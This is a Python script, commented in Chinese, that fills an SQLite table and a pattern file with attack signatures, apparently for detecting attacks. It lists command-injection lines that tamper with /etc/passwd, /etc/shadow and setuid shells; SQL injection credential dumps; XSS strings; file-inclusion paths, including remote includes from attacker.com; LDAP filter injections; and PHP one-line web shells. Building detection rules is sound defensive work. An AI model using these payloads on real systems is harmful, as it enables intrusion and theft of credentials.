import sqlite3
import os

# 定义特征库文件的路径
pattern_file = os.path.join(os.path.dirname(__file__), 'patternfile.txt')

# 读取特征库文件内容
with open(pattern_file, 'r') as file:
    patterns = file.readlines()

# 创建或连接到SQLite数据库
conn = sqlite3.connect('pattern_database.db')
cursor = conn.cursor()

# 创建特征表
cursor.execute('''
CREATE TABLE IF NOT EXISTS patterns (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    attack_type TEXT NOT NULL,
    pattern TEXT NOT NULL
)
''')

# 定义攻击类型和特征
attack_patterns = {
    "CommandInjection": [
        "/bin/cat /etc/passwd",
        "/bin/chmod 777 /etc/passwd",
        "/bin/chown *:* /etc/passwd",
        "/bin/chown root:root /tmp/backdoor",
        "/bin/chmod 755 /tmp/backdoor",
        "/bin/chown *:* /tmp/backdoor",
        "/bin/chmod 4777 /tmp/backdoor",
        "/bin/cp /bin/bash /tmp/",
        "/bin/chmod +s /tmp/bash",
        "/bin/chown $(whoami) /tmp/owned",
        "/bin/chmod +x /tmp/owned",
        "/bin/touch /tmp/owned",
        "/bin/chown *:* /var/www/html/backdoor.php",
        "/bin/chmod 755 /var/www/html/backdoor.php",
        "/bin/chown root:root /var/www/html/shell.php",
        "/bin/chmod 777 /var/www/html/shell.php",
        "/bin/chown *:* /var/www/html/shell.php",
        "/bin/chmod 644 /var/www/html/shell.php",
        "/bin/chown *:* /var/www/shell.php",
        "/bin/chmod 755 /var/www/shell.php",
        "/bin/chown *:* /var/www/html/shell.sh",
        "/bin/chmod 777 /var/www/html/shell.sh",
        "/bin/chown *:* /var/www/shell.sh",
        "/bin/chmod 755 /var/www/shell.sh",
        "/bin/chown *:* /var/www/html/shell.pl",
        "/bin/chmod 755 /var/www/html/shell.pl",
        "/bin/chown *:* /var/www/shell.pl",
        "/bin/chmod 755 /var/www/shell.pl",
        "/bin/chown *:* /tmp/shell.sh",
        "/bin/chmod 777 /tmp/shell.sh",
        "/bin/chown *:* /var/tmp/shell.sh",
        "/bin/chmod 755 /var/tmp/shell.sh",
        "/bin/chown *:* /tmp/shell.php",
        "/bin/chmod 755 /tmp/shell.php",
        "/bin/chown *:* /var/tmp/shell.php",
        "/bin/chmod 777 /var/tmp/shell.php",
        "/bin/chown *:* /var/backups/passwd",
        "/bin/chmod 644 /var/backups/passwd",
        "/bin/chown *:* /root/.bash_history",
        "/bin/chmod 666 /root/.bash_history",
        "/bin/chown *:* /home/user/.bashrc",
        "/bin/chmod 644 /home/user/.bashrc",
        "/bin/chown *:* /etc/shadow",
        "/bin/chmod 400 /etc/shadow",
        "/bin/chown *:* /etc/group",
        "/bin/chmod 644 /etc/group",
        "/bin/chown *:* /etc/hosts",
        "/bin/chmod 666 /etc/hosts",
        "/bin/chown *:* /etc/profile",
        "/bin/chmod 644 /etc/profile",
        "/bin/chown *:* /etc/profile.d/",
        "/bin/chmod -R 777 /etc/profile.d/",
        "/bin/chown *:* /etc/init.d/",
        "/bin/chmod 755 /etc/init.d/",
        "/bin/chown *:* /etc/cron.d/",
        "/bin/chmod 644 /etc/cron.d/",
        "/bin/chown *:* /etc/fstab",
        "/bin/chmod 644 /etc/fstab",
        "/bin/chown *:* /etc/passwd-",
        "/bin/chmod 644 /etc/passwd-",
        "/bin/chown *:* /etc/shadow-",
        "/bin/chmod 600 /etc/shadow-",
        "/bin/chown *:* /var/log/auth.log",
        "/bin/chmod 644 /var/log/auth.log",
        "/bin/chown *:* /var/log/syslog",
        "/bin/chmod 644 /var/log/syslog",
        "/bin/chown *:* /var/log/messages",
        "/bin/chmod 644 /var/log/messages"
    ],

    "SQLInjection": [
        "' OR '1'='1",
        "1' UNION SELECT null, null FROM users",
        "1' UNION SELECT * FROM (SELECT * FROM users) a",
        "1' AND 1=0 UNION SELECT table_name FROM information_schema.tables WHERE table_schema='database_name'",
        "1' AND 1=0 UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'",
        "1' AND 1=0 UNION SELECT CONCAT_WS(':', user, password) FROM users",
        "1' AND 1=0 UNION SELECT 1, GROUP_CONCAT(DISTINCT column_name) FROM information_schema.columns WHERE table_name='users'",
        "1' AND 1=0 UNION SELECT * FROM users WHERE 1=CAST((SELECT * FROM (SELECT SLEEP(5))) AS UNSIGNED)",
        "1' AND 1=0; --",
        "1' AND (SELECT * FROM (SELECT SLEEP(5)) a) AND '1",
        "1' AND (SELECT 1 FROM (SELECT SLEEP(5)) a) AND '1",
        "1' AND (SELECT COUNT(*) FROM (SELECT SLEEP(5)) a) AND '1",
        "1' AND (SELECT BENCHMARK(5000000, ENCODE('test', 'test'))) AND '1",
        "1' AND (SELECT * FROM (SELECT SLEEP(5)) a JOIN users ON 1) AND '1",
        "1' AND (SELECT * FROM (SELECT SLEEP(5)) a WHERE 1 AND users.id=1) AND '1",
        "1' AND (SELECT * FROM (SELECT SLEEP(5)) a WHERE 1 AND users.username='admin') AND '1",
        "1' AND (SELECT * FROM (SELECT SLEEP(5)) a WHERE 1 AND users.password=PASSWORD('password')) AND '1",
        "1' AND (SELECT * FROM users WHERE 1 AND SLEEP(5)) AND '1",
        "1' AND (SELECT * FROM users WHERE 1 AND (SELECT * FROM (SELECT SLEEP(5)) a)) AND '1",
        "1' AND (SELECT * FROM users WHERE 1 AND BENCHMARK(5000000, ENCODE('test', 'test'))) AND '1",
        "1' AND (SELECT * FROM users WHERE 1 AND (SELECT COUNT(*) FROM information_schema.tables)) AND '1",
        "1' AND (SELECT * FROM users WHERE 1 AND (SELECT * FROM information_schema.tables LIMIT 1)) AND '1",
        "1' AND (SELECT * FROM users WHERE 1 AND (SELECT table_name FROM information_schema.tables LIMIT 1)) AND '1",
        "1' AND (SELECT * FROM users WHERE 1 AND (SELECT column_name FROM information_schema.columns LIMIT 1)) AND '1",
        "1' AND (SELECT * FROM users WHERE 1 AND (SELECT CONCAT_WS(':', user, password) FROM users LIMIT 1)) AND '1",
        "1' AND 1=0 UNION ALL SELECT * FROM users",
        "1' AND 1=0 UNION ALL SELECT * FROM admin",
        "1' AND 1=0 UNION ALL SELECT CONCAT(user, 0x3a, password) FROM users",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='database_name') FROM users",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='users') FROM users",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users LIMIT 1), (SELECT password FROM users LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users LIMIT 1 OFFSET 1), (SELECT password FROM users LIMIT 1 OFFSET 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user='admin' LIMIT 1), (SELECT password FROM users WHERE user='admin' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%admin%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%admin%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user REGEXP 'admin' LIMIT 1), (SELECT password FROM users WHERE user REGEXP 'admin' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%@%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%@%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%_%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%_%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%-%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%-%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%\"%' ESCAPE '\' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%\"%' ESCAPE '\' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%\\'%' ESCAPE '\\' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%\\'%' ESCAPE '\\' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%[%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%[%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%]%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%]%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%`%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%`%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%\%' ESCAPE '\' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%\%' ESCAPE '\' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%&%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%&%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%*%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%*%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%?%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%?%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%;%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%;%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%|%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%|%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%<%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%<%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%>%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%>%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%{%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%{%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%}%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%}%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%(%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%(%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%)%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%)%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%=%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%=%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%+%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%+%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%-%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%-%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%!%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%!%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%~%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%~%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%^%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%^%' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%\%' ESCAPE '\' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%\%' ESCAPE '\' LIMIT 1)",
        "1' AND 1=0 UNION ALL SELECT 1, (SELECT user FROM users WHERE user LIKE '%%' LIMIT 1), (SELECT password FROM users WHERE user LIKE '%%' LIMIT 1)"
    ],
    
    "XSS": [
        "<script>alert('XSS')</script>",
        "<img src=x onerror=alert('XSS')>",
        "<iframe src=javascript:alert('XSS')>",
        "<style>@import'javascript:alert(\"XSS\")';</style>",
        "<body onload=alert('XSS')>",
        "<svg onload=alert('XSS')>",
        "<link rel=stylesheet href=javascript:alert('XSS')>",
        "<script>eval(location.hash.slice(1))</script>",
        "<script>fetch(atob('aW5wdXQgbmFtZQ=='))</script>",
        "<script>setTimeout('alert(\"XSS\")', 100)</script>",
        "<script>setInterval('alert(\"XSS\")', 100)</script>",
        "<script>document.write('<script>alert(\"XSS\")</script>')</script>",
        "<script>document.createElement('img').src='javascript:alert(\"XSS\")'</script>",
        "<script>document.location='javascript:alert(\"XSS\")';</script>",
        "<script>history.pushState(0,0,'javascript:alert(\"XSS\")');</script>",
        "<script>history.replaceState(0,0,'javascript:alert(\"XSS\")');</script>",
        "<script>top.location='javascript:alert(\"XSS\")';</script>",
        "<script>top.document.write('<script>alert(\"XSS\")</script>')</script>",
        "<script>top.document.createElement('img').src='javascript:alert(\"XSS\")';</script>",
        "<script>top.setTimeout('alert(\"XSS\")', 100)</script>",
        "<script>top.setInterval('alert(\"XSS\")', 100)</script>",
        "<script>top.execScript('alert(\"XSS\")', 'javascript');</script>",
        "<script>top.al\u007ert('XSS');</script>",
        "<script>top.open('javascript:alert(\"XSS\")');</script>",
        "<script>top.showModalDialog('javascript:alert(\"XSS\")');</script>",
        "<script>top.postMessage('XSS', '*');</script>",
        "<script>top.opener.document.write('<script>alert(\"XSS\")</script>')</script>",
        "<script>top.opener.document.createElement('img').src='javascript:alert(\"XSS\")';</script>",
        "<script>top.opener.setTimeout('alert(\"XSS\")', 100)</script>",
        "<script>top.opener.setInterval('alert(\"XSS\")', 100)</script>",
        "<script>top.opener.execScript('alert(\"XSS\")', 'javascript');</script>",
        "<script>top.opener.al\u007ert('XSS');</script>",
        "<script>top.opener.open('javascript:alert(\"XSS\")');</script>",
        "<script>top.opener.showModalDialog('javascript:alert(\"XSS\")');</script>",
        "<script>top.opener.postMessage('XSS', '*');</script>",
        "<script>parent.document.write('<script>alert(\"XSS\")</script>')</script>",
        "<script>parent.document.createElement('img').src='javascript:alert(\"XSS\")';</script>",
        "<script>parent.setTimeout('alert(\"XSS\")', 100)</script>",
        "<script>parent.setInterval('alert(\"XSS\")', 100)</script>",
        "<script>parent.execScript('alert(\"XSS\")', 'javascript');</script>",
        "<script>parent.al\u007ert('XSS');</script>",
        "<script>parent.open('javascript:alert(\"XSS\")');</script>",
        "<script>parent.showModalDialog('javascript:alert(\"XSS\")');</script>",
        "<script>parent.postMessage('XSS', '*');</script>",
        "<script>self.document.write('<script>alert(\"XSS\")</script>')</script>",
        "<script>self.document.createElement('img').src='javascript:alert(\"XSS\")';</script>",
        "<script>self.setTimeout('alert(\"XSS\")', 100)</script>",
        "<script>self.setInterval('alert(\"XSS\")', 100)</script>",
        "<script>self.execScript('alert(\"XSS\")', 'javascript');</script>",
        "<script>self.al\u007ert('XSS');</script>",
        "<script>self.open('javascript:alert(\"XSS\")');</script>",
        "<script>self.showModalDialog('javascript:alert(\"XSS\")');</script>",
        "<script>self.postMessage('XSS', '*');</script>",
        "<script>onerror=alert('XSS') src=x",
        "<script>onload=alert('XSS') src=x",
        "<script>onmouseover=alert('XSS') src=x",
        "<script>onclick=alert('XSS') src=x",
        "<script>onfocus=alert('XSS') src=x",
        "<script>onblur=alert('XSS') src=x",
        "<script>onchange=alert('XSS') src=x",
        "<script>onsubmit=alert('XSS') src=x",
        "<script>onreset=alert('XSS') src=x",
        "<script>onload=alert('XSS')>",
        "<script>onerror=alert('XSS')>",
        "<script>onmouseover=alert('XSS')>",
        "<script>onclick=alert('XSS')>",
        "<script>onfocus=alert('XSS')>",
        "<script>onblur=alert('XSS')>",
        "<script>onchange=alert('XSS')>",
        "<script>onsubmit=alert('XSS')>",
        "<script>onreset=alert('XSS')>",
        "<a href=\"javascript:alert('XSS')\">Click me</a>",
        "<div style=\"width:100%;height:100%;position:fixed;left:0;top:0;z-index:9999\" onmouseover=\"alert('XSS')\"></div>",
        "<div style=\"font-family:'foo&#110;bar';\">This input field has a XSS: <input></div>",
        "<div style=\"font-family:'foo[\\0]bar';\">This input field has a XSS: <input></div>",
        "<div style=\"font-family:'foo\\0bar';\">This input field has a XSS: <input></div>",
        "<div style=\"font-family:\\0\">This input field has a XSS: <input></div>"
    ],

   "FileInclusion": [
        "../../../../etc/passwd",
        "/etc/shadow",
        "/etc/hosts",
        "/etc/fstab",
        "/etc/passwd%00",
        "../../../../var/www/html/index.html",
        "http://example.com/shell.txt",
        "file:///etc/passwd",
        "http://attacker.com/malicious.txt",
        "../config/database.php",
        "../../../../../var/www/html/config.php",
        "../../../../etc/sudoers",
        "http://example.com/secrets.txt",
        "file:///var/www/html/secrets.txt",
        "http://attacker.com/remote.txt",
        "../include/config.php",
        "../../../../var/www/html/include.php",
        "http://example.com/hidden/admin.php",
        "file:///var/www/html/hidden/admin.php",
        "http://attacker.com/hidden/credentials.php",
        "../../../../../var/www/html/.htaccess",
        "http://example.com/.htpasswd",
        "file:///var/www/html/.htpasswd",
        "http://attacker.com/.htaccess",
        "../../../../../var/www/html/backup/config.tar.gz",
        "http://example.com/backup/config.zip",
        "file:///var/www/html/backup/config.zip",
        "http://attacker.com/backup/config.tar.gz",
        "../../../../../var/www/html/log/access.log",
        "http://example.com/log/error.log",
        "file:///var/www/html/log/error.log",
        "http://attacker.com/log/access.log",
        "../../../../../var/www/html/uploads/shell.php",
        "http://example.com/uploads/malicious.php",
        "file:///var/www/html/uploads/malicious.php",
        "http://attacker.com/uploads/shell.php",
        "../../../../../var/www/html/tmp/sensitive_data",
        "http://example.com/tmp/sensitive_info",
        "file:///var/www/html/tmp/sensitive_info",
        "http://attacker.com/tmp/sensitive_data",
        "../../../../../var/www/html/storage/framework/views",
        "http://example.com/storage/framework/sessions",
        "file:///var/www/html/storage/framework/sessions",
        "http://attacker.com/storage/framework/views",
        "../../../../../var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
        "http://example.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
        "file:///var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
        "http://attacker.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
        "../../../../../var/www/html/.env",
        "http://example.com/.env",
        "file:///var/www/html/.env",
        "http://attacker.com/.env",
        "../../../../../var/www/html/old_versions/index.php",
        "http://example.com/old_versions/config.php",
        "file:///var/www/html/old_versions/config.php",
        "http://attacker.com/old_versions/index.php",
        "../../../../../var/www/html/maintenance.php",
        "http://example.com/install.php",
        "file:///var/www/html/install.php",
        "http://attacker.com/maintenance.php",
        "../../../../../var/www/html/test.php",
        "http://example.com/debug.php",
        "file:///var/www/html/debug.php",
        "http://attacker.com/test.php"
    ], 

    "LDAPInjection": [
        "(&(objectClass=*)(|(uid=*)))",
        "(|(uid=*)))",
        "(|(!(uid=*)))",
        "*)(|(uid=*)))",
        "(|(uid=*))(",
        "(&(uid=*))(|(objectClass=*)))",
        "(&(objectClass=*))(|(uid=*)))",
        "(|(uid=*))(&(objectClass=*)))",
        "(&(!(uid=*)))(|(objectClass=*)))",
        "(&(objectClass=*))(|(!(uid=*))))",
        "(|(objectClass=*))(&(uid=*)))",
        "(|(!(uid=*)))(&(objectClass=*)))",
        "(&(uid=*))(|(objectClass=person)))",
        "(&(objectClass=person))(|(uid=*)))",
        "(|(uid=*))(&(objectClass=inetOrgPerson)))",
        "(&(objectClass=inetOrgPerson))(|(uid=*)))",
        "(&(uid=*))(|(objectClass=organizationalPerson)))",
        "(&(objectClass=organizationalPerson))(|(uid=*)))",
        "(&(uid=*))(|(objectClass=*))(!(objectClass=computer)))",
        "(&(objectClass=*))(|(uid=*))(!(objectClass=computer)))",
        "(|(uid=*))(&(objectClass=*))(!(objectCategory=computer)))",
        "(&(objectCategory=*))(|(uid=*))(!(objectClass=computer)))",
        "(&(uid=*))(|(objectCategory=person))(!(objectClass=computer)))",
        "(&(objectCategory=person))(|(uid=*))(!(objectClass=computer)))",
        "(&(uid=*))(|(objectCategory=inetOrgPerson))(!(objectClass=computer)))",
        "(&(objectCategory=inetOrgPerson))(|(uid=*))(!(objectClass=computer)))",
        "(&(uid=*))(|(objectCategory=organizationalPerson))(!(objectClass=computer)))",
        "(&(objectCategory=organizationalPerson))(|(uid=*))(!(objectClass=computer)))",
        "(&(uid=*))(|(sn=*)))",
        "(&(sn=*))(|(uid=*)))",
        "(&(uid=*))(|(cn=*)))",
        "(&(cn=*))(|(uid=*)))",
        "(&(uid=*))(|(givenName=*)))",
        "(&(givenName=*))(|(uid=*)))",
        "(&(uid=*))(|(sn=*))(|(cn=*))))",
        "(&(sn=*))(|(uid=*))(|(cn=*))))",
        "(&(uid=*))(|(sn=*))(|(givenName=*))))",
        "(&(givenName=*))(|(uid=*))(|(sn=*))))",
        "(&(uid=*))(|(cn=*))(|(givenName=*))))",
        "(&(cn=*))(|(uid=*))(|(givenName=*))))",
        "(&(uid=*))(|(mail=*)))",
        "(&(mail=*))(|(uid=*)))",
        "(&(uid=*))(|(telephoneNumber=*)))",
        "(&(telephoneNumber=*))(|(uid=*)))",
        "(&(uid=*))(|(homePhone=*)))",
        "(&(homePhone=*))(|(uid=*)))",
        "(&(uid=*))(|(mobile=*)))",
        "(&(mobile=*))(|(uid=*)))",
        "(&(uid=*))(|(ipPhone=*)))",
        "(&(ipPhone=*))(|(uid=*)))",
        "(&(uid=*))(|(pager=*)))",
        "(&(pager=*))(|(uid=*)))",
        "(&(uid=*))(|(facsimileTelephoneNumber=*)))",
        "(&(facsimileTelephoneNumber=*))(|(uid=*)))",
        "(&(uid=*))(|(street=*)))",
        "(&(street=*))(|(uid=*)))",
        "(&(uid=*))(|(l=*)))",
        "(&(l=*))(|(uid=*)))",
        "(&(uid=*))(|(st=*)))",
        "(&(st=*))(|(uid=*)))",
        "(&(uid=*))(|(o=*)))",
        "(&(o=*))(|(uid=*)))",
        "(&(uid=*))(|(ou=*)))",
        "(&(ou=*))(|(uid=*)))",
        "(&(uid=*))(|(postalCode=*)))",
        "(&(postalCode=*))(|(uid=*)))",
        "(&(uid=*))(|(postalAddress=*)))",
        "(&(postalAddress=*))(|(uid=*)))",
        "(&(uid=*))(|(co=*)))",
        "(&(co=*))(|(uid=*)))"
    ],
    
    "PHPCodeInjection": [
        "?php=system($_GET['cmd']);?>",
        "<?php eval($_GET['cmd']); ?>",
        "<?php system($_GET['cmd']); ?>",
        "<?php passthru($_GET['cmd']); ?>",
        "<?php shell_exec($_GET['cmd']); ?>",
        "<?php assert($_GET['cmd']); ?>",
        "<?php eval($_POST['cmd']); ?>",
        "<?php system($_POST['cmd']); ?>",
        "<?php passthru($_POST['cmd']); ?>",
        "<?php shell_exec($_POST['cmd']); ?>",
        "<?php assert($_POST['cmd']); ?>",
        "<?php eval($_REQUEST['cmd']); ?>",
        "<?php system($_REQUEST['cmd']); ?>",
        "<?php passthru($_REQUEST['cmd']); ?>",
        "<?php shell_exec($_REQUEST['cmd']); ?>",
        "<?php assert($_REQUEST['cmd']); ?>",
        "<?php eval($HTTP_GET_VARS['cmd']); ?>",
        "<?php system($HTTP_GET_VARS['cmd']); ?>",
        "<?php passthru($HTTP_GET_VARS['cmd']); ?>",
        "<?php shell_exec($HTTP_GET_VARS['cmd']); ?>",
        "<?php assert($HTTP_GET_VARS['cmd']); ?>",
        "<?php eval($HTTP_POST_VARS['cmd']); ?>",
        "<?php system($HTTP_POST_VARS['cmd']); ?>",
        "<?php passthru($HTTP_POST_VARS['cmd']); ?>",
        "<?php shell_exec($HTTP_POST_VARS['cmd']); ?>",
        "<?php assert($HTTP_POST_VARS['cmd']); ?>",
        "<?php eval($GLOBALS['HTTP_GET_VARS']['cmd']); ?>",
        "<?php system($GLOBALS['HTTP_GET_VARS']['cmd']); ?>",
        "<?php passthru($GLOBALS['HTTP_GET_VARS']['cmd']); ?>",
        "<?php shell_exec($GLOBALS['HTTP_GET_VARS']['cmd']); ?>",
        "<?php assert($GLOBALS['HTTP_GET_VARS']['cmd']); ?>",
        "<?php eval($GLOBALS['HTTP_POST_VARS']['cmd']); ?>",
        "<?php system($GLOBALS['HTTP_POST_VARS']['cmd']); ?>",
        "<?php passthru($GLOBALS['HTTP_POST_VARS']['cmd']); ?>",
        "<?php shell_exec($GLOBALS['HTTP_POST_VARS']['cmd']); ?>",
        "<?php assert($GLOBALS['HTTP_POST_VARS']['cmd']); ?>",
        "<?php eval($_SERVER['QUERY_STRING']); ?>",
        "<?php system($_SERVER['QUERY_STRING']); ?>",
        "<?php passthru($_SERVER['QUERY_STRING']); ?>",
        "<?php shell_exec($_SERVER['QUERY_STRING']); ?>",
        "<?php eval($_COOKIE['cmd']); ?>",
        "<?php system($_COOKIE['cmd']); ?>",
        "<?php passthru($_COOKIE['cmd']); ?>",
        "<?php shell_exec($_COOKIE['cmd']); ?>",
        "<?php eval($argv[1]); ?>",
        "<?php system($argv[1]); ?>",
        "<?php passthru($argv[1]); ?>",
        "<?php shell_exec($argv[1]); ?>",
        "<?php eval($argc); ?>",
        "<?php system($argc); ?>",
        "<?php passthru($argc); ?>",
        "<?php shell_exec($argc); ?>",
        "<?php eval($_ENV['cmd']); ?>",
        "<?php system($_ENV['cmd']); ?>",
        "<?php passthru($_ENV['cmd']); ?>",
        "<?php shell_exec($_ENV['cmd']); ?>",
        "<?php eval($_FILES['cmd']); ?>",
        "<?php system($_FILES['cmd']); ?>",
        "<?php passthru($_FILES['cmd']); ?>",
        "<?php shell_exec($_FILES['cmd']); ?>"
    ],

}

# 插入特征到数据库中
for attack_type, patterns in attack_patterns.items():
    for pattern in patterns:
        cursor.execute('''
        INSERT INTO patterns (attack_type, pattern)
        VALUES (?, ?)
        ''', (attack_type, pattern))

# 提交更改并关闭数据库连接
conn.commit()
conn.close()

print("New pattern database created and populated successfully.")

with open('patternfile', 'w') as f:
    
    for attack_type, examples in attack_patterns.items():
        for example in examples:

            f.write(f"{attack_type}#{attack_type}?{example}\n")